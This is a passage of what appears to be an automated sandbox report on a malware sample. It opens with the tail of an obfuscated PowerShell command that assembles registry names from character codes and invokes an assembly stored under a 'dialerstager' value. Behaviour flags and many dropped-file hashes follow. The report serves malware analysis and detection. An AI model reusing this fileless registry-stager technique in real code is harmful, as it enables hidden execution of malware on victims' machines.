Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('d'+[Char](105)+''+[Char](97)+'l'+[Char](101)+''+'r'+''+'s'+''+'t'+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
19KB
MD52a8b644b26ededb295b31068db08630f
SHA1a1387c761fca641be150e1eb27ca43543625a8a0
SHA256bedac1113a80677359d099aa29f7452c5b03a0201decc98a5c89867104630821
SHA51232f3924eab4257f20ea4b8c7bb8ed78490fd198f987474afae920f932c4321569d5617aefcb709617229d5d29f053acd6f315701b57b89569c0e7012bfed4176
-
Filesize
948B
MD5a7ce8cefc3f798abe5abd683d0ef26dd
SHA1b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA2565e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64
-
Filesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
674KB
MD5e479ecb1802253a4c94767c8af306baf
SHA1846bb5d88b91b8aa17bdb58eaf246b10e6586402
SHA256b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679
SHA512b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373
-
Filesize
674KB
MD5e479ecb1802253a4c94767c8af306baf
SHA1846bb5d88b91b8aa17bdb58eaf246b10e6586402
SHA256b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679
SHA512b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373
-
Filesize
20KB
-
Filesize
20KB
-
Filesize
64KB
-
Filesize
5.0MB
-
Filesize
1.2MB
-
Filesize
5.0MB
-
Filesize
1.2MB
-
Filesize
10.8MB
-
Filesize
760KB
-
Filesize
2.0MB
-
Filesize
760KB
-
Filesize
2.0MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
164KB
-
Filesize
2.0MB
-
Filesize
760KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
2.0MB
-
Filesize
120KB
-
Filesize
128KB
-
Filesize
1.8MB
-
Filesize
472KB
-
Filesize
320KB
-
Filesize
6.1MB
-
Filesize
72KB
-
Filesize
1.0MB
-
Filesize
5.2MB
-
Filesize
240KB
-
Filesize
584KB
-
Filesize
40KB
-
Filesize
1.4MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
216KB
-
Filesize
6.2MB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
136KB
-
Filesize
32KB
-
Filesize
104KB
-
Filesize
56KB
-
Filesize
600KB
-
Filesize
40KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
200KB
-
Filesize
120KB